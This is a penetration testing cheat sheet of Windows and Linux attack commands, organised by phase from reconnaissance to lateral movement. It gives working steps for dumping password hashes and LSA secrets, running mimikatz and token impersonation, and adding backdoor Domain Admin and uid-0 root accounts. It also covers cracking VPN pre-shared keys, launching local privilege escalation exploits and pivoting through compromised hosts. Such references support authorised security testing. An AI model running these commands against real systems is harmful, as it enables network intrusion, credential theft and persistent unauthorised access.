Title: Penetration Testing Cheatsheet
Author: ajayverma
[+] Reminders


Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0 <ip> netmask <netmask>

Set default gateway
route add default gw <gateway ip>

Set DNS servers
echo "nameserver <dns ip>" >> /etc/resolv.conf

Show routing table
Windows - route print
Linux - route -n

Add static route
Linux - route add -net <network> netmask <netmask> gw <gateway ip>
Windows - route add <network> mask <netmask> <gateway ip>

Subnetting easy mode

[+] External Infrastructure Testing - Information Gathering

WHOIS Querying
whois www.domain.com

Resolve a hostname using host (or dig)
host www.google.com

Find Mail servers for a domain
host -t mx www.gmail.com

Find any DNS records for a domain
host -t any www.google.com

Zone Transfer
host -l securitymuppets.com

Metasploit Auxiliaries

fierce -dns <domain> -wordlist <wordlist>

[+] External Infrastructure Testing - VPN Testing

sudo ike-scan -A <ip>
sudo ike-scan -A <ip> --id=myid -P192-168-207-134key

psk-crack -b 5 192-168-207-134key
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary 192-168-207-134key

[+] Internal Infrastructure Testing - Network Enumeration

DHCP Information - Use ipconfig /all to obtain useful information.

Network Sniffing (Wireshark, tshark, tcpdump)
Sniffing is a great passive method for mapping networks and systems. Typically, you’ll see a lot of broadcast traffic such as DNS, NBNS, BROWSER, and Cisco protocols that reveal hostnames, active subnets, VLANS, and domain names.

Net view
net view /ALL /Domain:clientdomain.com

ARP Scan
arp-scan -I eth0 <range>

Nmap ping scan
sudo nmap -sn <range> -oA nmap_pingscan

Nmap SYN/Top 100 ports Scan
nmap -sS -F <range> -oA nmap_fastscan

Nmap all port version scan
sudo nmap -sTV -p0- -A --stats-every 10s --reason --min-rate 1000 <target> -oA nmap_scan

Nmap UDP all port scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 <target> -oA nmap_scan

Nmap source port scanning
nmap -g <port> <target> #Commonly allowed source ports: 88 (Kerberos), 53 (DNS) or 67 (DHCP)

Hping3 scanning
hping3 -c 3 -s 53 -p 80 -S <target>
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

[+] Internal Infrastructure Testing - Windows Domain Enumeration

Obtain domain information using windows
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

DNS Lookup
nslookup -type=SRV _ldap._tcp.<domain>

User/Domain enumeration using RDP
rdesktop -u "" <ip>

Net Group Command
net group "Domain Controllers" /domain

Netbios enumeration
nbtscan -r <range>
nbtscan -f hostfiles.txt


RID cycling
use auxiliary/scanner/smb/smb_lookupsid

Net Users
net users /domain

Null session in windows
net use \\<ip>\IPC$ "" /u:""

Null session in linux
smbclient -L //<ip>

nbtscan -r <range>

Sharepoint User Profile Page
Find SharePoint servers with nmap, Nessus etc.

Net Accounts - Obtain Password Policy
net accounts

[+] Internal Infrastructure Testing - Quick Domain Administrator Compromise

Compromise machine via missing Microsoft patch, weak credentials or credentials found via Responder.

From Shell - net group "Domain Admins" /domain

Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts <range>
msf > set threads 8
msf > run
msf > spool off

Compromise the administrator's machine
meterpreter > load mimikatz
meterpreter > wdigest


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

[+] Internal Infrastructure Testing - Post Exploitation

meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets

Privilege Escalation (If Required)
run post/windows/escalate/getsystem
use post/windows/escalate/droplnk
use exploit/windows/local/bypassuac
use exploit/windows/local/service_permissions
use exploit/windows/local/trusted_service_path
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ms_ndproxy
use exploit/windows/local/ask

meterpreter> run getcountermeasure
meterpreter> run winenum
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/credentials/sso
meterpreter> run post/windows/gather/cachedump
meterpreter> run post/windows/gather/lsa_secrets
meterpreter> run post/windows/gather/enum_ad_computers
meterpreter> run post/windows/gather/win_privs
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h
meterpreter > add_group_user "Domain Admins" hacker -h

meterpreter > load mimikatz
meterpreter > wdigest

Find Group Policy Preference XML files:
C:\> findstr /S cpassword %logonserver%\sysvol\*.xml
meterpreter > run post/windows/gather/credentials/gpp

Dump remote SAM:
meterpreter> run post/windows/gather/smart_hashdump

Add Windows User
net user username password /ADD
net localgroup Administrators username /ADD

net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

Windows Information via Command Prompt
ipconfig /all
net localgroup administrators
net view
net view /domain
net accounts /domain
net group "Domain Admins" /domain


Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell

Add Linux User
/usr/sbin/useradd -g 0 -u 0 -o user
echo user:password | /usr/sbin/chpasswd

Solaris Commands
useradd -o user
passwd user
usermod -R root user

SSH Tunnelling
Remote forward port 222
ssh -R 222:<local host>:<local port> -p 443 root@<remote host>

[+] Pivoting - Lateral Movement

meterpreter> run arp_scanner -r <range>
route add <subnet> <netmask> <session>
use auxiliary/scanner/portscan/tcp

meterpreter > ipconfig
meterpreter > run autoroute -s <subnet>
meterpreter > getsystem
meterpreter > run hashdump
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > use exploit/windows/smb/psexec

port forwarding:
meterpreter > run autoroute -s <subnet>
use auxiliary/scanner/portscan/tcp
meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>

socks proxy:
route add <subnet> <netmask> <session>
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn <target>
setg Proxies socks4:<proxy ip>:<proxy port>

[+] Internal/External Infrastructure Testing - Service Enumeration

Finger - Enumerate Users
finger @<ip>
finger -l -p user@ip-address
Metasploit - auxiliary/scanner/finger/finger_users

Metasploit auxiliaries

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>
Metasploit Module snmp_enum
snmpcheck -t snmpservice

rlogin -l root <ip>

RPC Services
rpcinfo -p <ip>
Endpoint_mapper metasploit

showmount -e <ip>
mount <ip>:/<share> /mnt/share/
Metasploit - auxiliary/scanner/nfs/nfsmount
rpcinfo -p <ip>


ldapsearch -h <ip> -p 389 -x -s base

Anonymous Bind:
ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"

ldapsearch -h <ip> -p 389 -x -D "CN=Administrator, CN=Users, DC=<domain>, DC=com" -b "DC=<domain>, DC=com" -W

ncat -C mail.host.com 25

EHLO hostname
MAIL FROM: test@host.com
RCPT TO: www@host.com
DATA
From: A tester <test@host.com>
To: <www@host.com>
Date: date
Subject: A test message from hostname

Delete me, please
.

